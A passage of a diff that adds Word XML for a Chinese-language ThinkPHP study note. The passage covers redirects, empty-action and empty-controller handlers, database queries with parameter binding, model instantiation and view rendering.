+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">       </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>//return $this-&gt;redirect('index/index/index');//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>重定向到其他控制器或模块</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">       </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>return $this-&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>redirect</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>('https://cn.bing.com');//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>重定向到外部网页</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>空操作</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+            <w:r>
+              <w:t>url</w:t>
+            </w:r>
+            <w:r>
+              <w:t>为不存在的操作时调用</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="360"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>public function _empty($name){//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>用于操作不存在的时候调用</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>return $this-&gt;hello($name);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>空</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>控制器</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：定义</w:t>
+            </w:r>
+            <w:r>
+              <w:t>Error</w:t>
+            </w:r>
+            <w:r>
+              <w:t>控制器类在控制器不存在时调用，</w:t>
+            </w:r>
+            <w:r>
+              <w:t>Error</w:t>
+            </w:r>
+            <w:r>
+              <w:t>名可以</w:t>
+            </w:r>
+            <w:r>
+              <w:t>config</w:t>
+            </w:r>
+            <w:r>
+              <w:t>中修改</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>class Error</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>{</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>public function index()</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>{</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>return '</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>没有此控制器</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>';</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2.3 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>模型</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a4"/>
+        <w:tblW w:w="5000" w:type="pct"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9659"/>
+        <w:gridCol w:w="9660"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2500" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>数据库</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>连接</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>ThinkPHP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>内置了抽象数据库访问层，把不同的数据库操作封装起来，我们只需要</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>在</w:t>
+            </w:r>
+            <w:r>
+              <w:t>database.php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>配置</w:t>
+            </w:r>
+            <w:r>
+              <w:t>数据库连接参数，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>使用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>公共的</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>Db</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>类</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>进行操作</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>。</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>配置了数据库连接信息后，我们就可以直接使用数据库运行原生</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>SQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>操作了，支持</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>query</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>（查询操作）和</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>execute</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>（写入操作）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>方法，并且支持参数绑定。</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>Db::query('select * from think_user where id=?',[8]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>Db::execute('insert into think_user (id, name) values (?, ?)',[8,'thinkphp']);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>Model</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>属性</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>:</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>通常</w:t>
+            </w:r>
+            <w:r>
+              <w:t>一个</w:t>
+            </w:r>
+            <w:r>
+              <w:t>model</w:t>
+            </w:r>
+            <w:r>
+              <w:t>对应一个数据</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>表</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BA01E10" wp14:editId="78AE426C">
+                  <wp:extent cx="3951605" cy="1094740"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="13" name="图片 13"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId22"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3951605" cy="1094740"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2500" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>M</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>odel</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>实例化</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">$User = \think\Loader::model('admin/User'); </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>或</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="420"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$User = D('admin/User');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>相当于</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> $User = new \app\admin\model\User();</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.4 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>视图</w:t>
+      </w:r>
+      <w:r>
+        <w:t>和模板</w:t>
+      </w:r>
     </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a4"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="6437"/>
+        <w:gridCol w:w="6441"/>
+        <w:gridCol w:w="6441"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6437" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>视图功能由</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>\think\View</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>类配合视图驱动（模板引擎）类一起完成，目前的内置模板引擎包含</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>PHP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>原生模板和</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Think</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>模板引擎</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>视图</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>实例化</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）模板输出</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>实例化视图类</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$view = new \think\View();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>渲染模板输出</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>并赋值模板变量</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="420"/>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return $view-&gt;fetch('hello',['name'=&gt;'thinkphp']);</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>//hello</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>模板</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>的</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>路径</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>应该是</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>view/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>控制器</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>名</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>操作</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>名</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>.html</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）内容输出</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$view = new \think\View();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="420"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return $view-&gt;show($content,$vars);</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>直接解析内容而不通过模板文件</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>模板</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>引擎</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
